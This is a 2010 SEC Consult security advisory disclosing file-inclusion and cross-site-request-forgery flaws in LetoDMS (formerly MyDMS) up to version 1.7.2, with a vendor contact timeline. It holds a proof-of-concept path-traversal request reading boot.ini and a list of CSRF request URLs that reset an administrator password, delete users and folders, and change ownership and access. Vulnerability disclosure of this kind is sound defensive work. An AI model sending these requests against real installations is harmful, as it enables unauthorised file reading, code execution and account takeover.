SEC Consult Security Advisory < 20100115-0 >
========================================================================
              title: Local file inclusion/execution and multiple 
                     Cross-Site-Request-Forgery vulnerabilities in 
                     LetoDMS (formerly MyDMS)
           products: LetoDMS (formerly MyDMS)
 vulnerable version: LetoDMS (formerly MyDMS) <= 1.7.2
      fixed version: n.a.
             impact: critical
           homepage: http://sourceforge.net/projects/mydms/
              found: 2009-10-09
                 by: D. Fabian / SEC Consult / www.sec-consult.com
                     L. Weichselbaum / SEC Consult / www.sec-consult.com
========================================================================

Vendor description:
-------------------
MyDMS is an open-source, web-based document management system (DMS) 
written in PHP with a database backend. Originally coded by Markus 
Westphal, MyDMS provides document meta-data, version control, security 
and easy access to your documents.

source: http://sourceforge.net/projects/mydms/


Vulnerability overview/description:
-----------------------------------
The lang-parameter of /mydms/op/op.Login.php is vulnerable to file 
inclusion. Through this vulnerability it is possible to read sensitive 
data of the web server and to execute malicious PHP-code.

Furthermore there exist multiple Cross-Site-Request-Forgery
vulnerabilities which can be used to force a user/admin to execute
unwanted actions. Some of these actions are:
* Create new user with admin-privileges
* Change user credentials
* Delete a user/folder/document
* Change owner of a document 
* Change access to a document
* Add keywords
* Add notifications
* Move folders


Proof of concept:
-----------------
File inclusion/execution
========================
If the guest-account is activated or you have a user to log in, it is
possible to include or execute files. The lang-parameter can be
modified in a malicious way. To terminate the predefined file-ending a
null-byte has to be appended after the file to be included. The
following GET-request can be used to e.g. receive the content of the
boot.ini-file on a server running Windows as operating system. This
vulnerability can also be used to execute malicious PHP-code (e.g.
PHP-code that has been written into log-files). 


PoC request

GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../
boot.ini%00&sesstheme= HTTP/1.1
[...]


Cross-Site-Request-Forgery (CSRF)
=================================
The following requests can be used for CSRF-attacks:

- (only POST) /mydms/op/op.EditUserData.php?pwd=0wned&pwdconf=0wned
  &fullname=Administrator&email=address@server.com&comment=&userfile= 
- /mydms/op/op.UsrMgr.php?userid=3&action=removeuser
- /mydms/out/out.RemoveVersion.php?documentid=1&version=1
- /mydms/op/op.RemoveFolder.php?folderid=2
- /mydms/op/op.DefaultKeywords.php?action=addcategory&name=test
- /mydms/op/op.GroupMgr.php?action=addgroup&name=test&comment=
- /mydms/op/op.FolderAccess.php?action=setowner&folderid=1&ownerid=3
- /mydms/op/op.FolderAccess.php?folderid=1&action=setdefault&mode=4
- /mydms/op/op.FolderAccess.php?folderid=1&action=addaccess&userid=3
  &groupid=-1&mode=4
- /mydms/op/op.FolderNotify.php?folderid=1&action=addnotify&userid=3
  &groupid=-1
- /mydms/op/op.MoveFolder.php?folderid=4&targetid=1

It is assumed that there is more functionality vulnerable to
CSRF-attacks


Vulnerable versions:
--------------------
MyDMS 
* <= 1.7.2

Vendor contact timeline:
------------------------
2009-10-29: Contacting developers on SourceForge.Net and on
trilexnet.com by contact-form and the dev-forum.
2009-12-11: No response from developers so far.
2009-12-11: New attempt to contact developers.
2010-01-15: No response from developers.
2010-01-15: Release of the advisory.


Solution:
---------
n.a.

Advisory URL:
-------------
https://www.sec-consult.com/advisories.html#a64


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

SEC Consult conducts periodical information security workshops on ISO 
27001/BS 7799 in cooperation with BSI Management Systems. For more 
information, please refer to https://www.sec-consult.com/academy_e.html

EOF L. Weichselbaum / @2010